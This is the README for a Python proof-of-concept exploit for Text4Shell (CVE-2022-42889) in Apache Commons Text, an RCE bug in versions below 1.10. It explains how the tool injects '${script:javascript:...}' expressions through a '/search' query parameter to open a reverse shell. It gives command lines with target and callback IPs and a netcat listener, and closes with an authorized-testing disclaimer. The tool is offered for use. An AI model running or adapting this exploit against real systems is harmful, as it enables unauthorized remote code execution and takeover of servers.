A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889) — a critical Remote Code Execution (RCE) vulnerability in Apache Commons Text versions < 1.10.
This Python 3 PoC leverages the Text4Shell vulnerability to achieve RCE in Java applications that improperly interpolate user input using the StringSubstitutor class. The exploit injects ${script:...} expressions which are evaluated and executed on the server.
This variant demonstrates exploitation via the query parameter of the /search endpoint, but the vulnerable parameter and endpoint may vary depending on the application’s implementation.
This updated version builds on the original PoC by chaudharyarjun/text4shell-exploit and introduces key enhancements for greater flexibility:
- Dynamic HTTP method selection: Specify
GETorPOSTat runtime via command-line arguments. - Customizable target port and vulnerable parameter: Easily modify the target port and vulnerable parameter (
queryby default). - Improved error handling and usage instructions for clarity.
python3 text4shell.py <target_ip> <target_port> <callback_ip> <callback_port> <GET|POST>python3 text4shell.py 192.168.110.150 8080 192.168.1.1 4444 GETThe script injects a reverse shell payload like:
${script:javascript:var p=java.lang.Runtime.getRuntime().exec(...)}The payload is URL-encoded and sent to the /search endpoint via the specified HTTP method (GET or POST), targeting the vulnerable parameter query. Set up a Netcat listener to catch the reverse shell:
nc -nlvp 4444This exploit is provided for educational and authorized penetration testing purposes only. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal and unethical.